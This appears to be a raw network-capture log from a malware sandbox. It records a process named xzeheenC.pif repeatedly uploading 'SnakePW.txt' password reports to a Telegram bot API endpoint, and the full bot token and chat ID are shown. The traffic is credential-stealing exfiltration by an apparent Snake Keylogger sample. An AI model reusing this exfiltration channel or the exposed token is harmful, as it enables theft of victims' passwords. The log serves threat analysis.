                                                                                                        2024-12-18 15:32:25 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419244,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535944,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        114192.168.2.849922149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:25 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd245aeb8c82be
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 35 61 65 62 38 63 38 32 62 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd245aeb8c82beContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:25 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:25 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 517
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:25 UTC517INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419246,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535945,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        115192.168.2.849924149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:25 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22be5581407d
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:25 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 62 65 35 35 38 31 34 30 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd22be5581407dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:26 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:26 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419248,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535946,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        116192.168.2.849927149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:26 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd26038213f839
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:26 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 30 33 38 32 31 33 66 38 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd26038213f839Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:26 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:26 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:26 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419250,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535946,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        117192.168.2.849930149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd24a8fb2c45b9
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 61 38 66 62 32 63 34 35 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd24a8fb2c45b9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:27 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:27 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:27 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419252,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535947,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        118192.168.2.849931149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:27 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd22fa34213483
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:27 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 66 61 33 34 32 31 33 34 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd22fa34213483Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:28 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419254,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535948,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        119192.168.2.849934149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:28 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2698048ede00
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:28 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 39 38 30 34 38 65 64 65 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2698048ede00Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:28 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:28 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419256,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535948,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        120192.168.2.849938149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:29 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd24f586dd246f
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:29 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 66 35 38 36 64 64 32 34 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd24f586dd246fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:30 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:30 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
